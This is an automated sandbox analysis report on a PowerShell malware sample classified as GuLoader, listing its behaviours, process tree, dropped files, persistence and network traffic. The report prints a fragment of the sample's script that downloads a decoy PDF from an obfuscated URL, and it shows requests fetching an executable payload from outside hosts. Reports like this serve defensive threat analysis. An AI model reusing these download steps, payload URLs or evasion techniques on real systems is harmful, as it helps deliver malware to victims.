Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eua.ps1

Overview

General Information

Sample Name:eua.ps1
Analysis ID:879706
MD5:d5e25a8c8e85c5fa9991211f997985cf
SHA1:8a895a7fba1db62268d9432e0b6fc0d71c4f7052
SHA256:7ce62c06be515c4e3e45f855d4ffd3d03cb6f9d78d7387e397881f5cedeb6ce5
Tags:ps1www-dld-ae
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected GuLoader
Powershell drops PE file
Opens the same file many times (likely Sandbox evasion)
Tries to detect virtualization through RDTSC time measurements
Drops PE files to the user root directory
Powershell creates an autostart link
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Drops PE files to the user directory
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6096 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\eua.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • fcab.bat (PID: 7052 cmdline: "C:\Users\Public\fcab.bat" MD5: 9DCA43CB15D97693D2DE73683804C5C7)
    • AcroRd32.exe (PID: 7492 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
      • RdrCEF.exe (PID: 7788 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.645631516.0000000007E21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results
    Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.3:49697 version: TLS 1.0
    Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: fcab.bat, 00000002.00000003.399907414.000000000283A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: fcab.bat, 00000002.00000003.399907414.000000000283A000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\Public\fcab.batCode function: 2_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040595A
    Source: C:\Users\Public\fcab.batCode function: 2_2_0040658F FindFirstFileW,FindClose,2_2_0040658F
    Source: C:\Users\Public\fcab.batCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
    Source: global trafficHTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.3:49697 version: TLS 1.0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: powershell.exe, 00000000.00000002.489529975.000001EA7E8BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: fcab.bat, 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000000.00000002.484779115.000001EA768F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E8F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000000.00000002.419761762.000001EA66881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E8F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000000.00000002.419761762.000001EA67986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.419761762.000001EA67997000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
    Source: powershell.exe, 00000000.00000002.419761762.000001EA67986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
    Source: powershell.exe, 00000000.00000003.385520918.000001EA7E8F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.blufwzmaxxlasfwzr.com/rh/List%20of%20rfwzquirfwzd%20itfwzms%20and%20sfwzrvicfwzs.pdf
    Source: fcab.bat, 00000002.00000003.400335008.000000000283D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oruddho.com
    Source: powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E8F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000000.00000002.419761762.000001EA6835C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000000.00000002.489529975.000001EA7E936000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.385520918.000001EA7E937000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.384414473.000001EA7E921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
    Source: powershell.exe, 00000000.00000002.484779115.000001EA768F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.419761762.000001EA66A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.484779115.000001EA76A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000000.00000002.419761762.000001EA67289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae
    Source: powershell.exe, 00000000.00000002.419761762.000001EA67289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dld.ae/zp/zpeu.exe
    Source: unknownDNS traffic detected: queries for: www.dld.ae
    Source: global trafficHTTP traffic detected: GET /zp/zpeu.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
    Source: fcab.bat, 00000002.00000002.645142800.000000000061A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: C:\Users\Public\fcab.batCode function: 2_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_004053EF

    System Summary

    barindex
    Powershell drops PE file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\fcab.batJump to dropped file
    Source: C:\Users\Public\fcab.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D
    Source: C:\Users\Public\fcab.batCode function: 2_2_004069562_2_00406956
    Source: C:\Users\Public\fcab.batCode function: 2_2_00404C2C2_2_00404C2C
    Source: C:\Users\Public\fcab.batProcess Stats: CPU usage > 98%
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\eua.ps1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\fcab.bat "C:\Users\Public\fcab.bat"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\fcab.bat "C:\Users\Public\fcab.bat" Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\Public\fcab.batKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Users\Public\fcab.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\fcab.batJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_koaug0jv.qrs.ps1Jump to behavior
    Source: classification engineClassification label: mal68.troj.evad.winPS1@14/66@3/3
    Source: C:\Users\Public\fcab.batCode function: 2_2_004020FE CoCreateInstance,2_2_004020FE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\fcab.batCode function: 2_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004046B0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_01
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: fcab.bat, 00000002.00000003.399907414.000000000283A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: fcab.bat, 00000002.00000003.399907414.000000000283A000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000002.00000002.645631516.0000000007E21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\fcab.batCode function: 2_2_10002DE0 push eax; ret 2_2_10002E0E
    Source: C:\Users\Public\fcab.batCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\fcab.batJump to dropped file
    Source: C:\Users\Public\fcab.batFile created: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\fcab.batJump to dropped file
    Source: C:\Users\Public\fcab.batFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\fcab.batJump to dropped file

    Boot Survival

    barindex
    Drops PE files to the user root directory
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\fcab.batJump to dropped file
    Powershell creates an autostart link
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.blufwzmaxxlasfwzr.com/rh/List%20of%20rfwzquirfwzd%20itfwzms%20and%20sfwzrvicfwzs.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powers
    Source: C:\Users\Public\fcab.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\LangustJump to behavior
    Source: C:\Users\Public\fcab.batFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\GradeJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
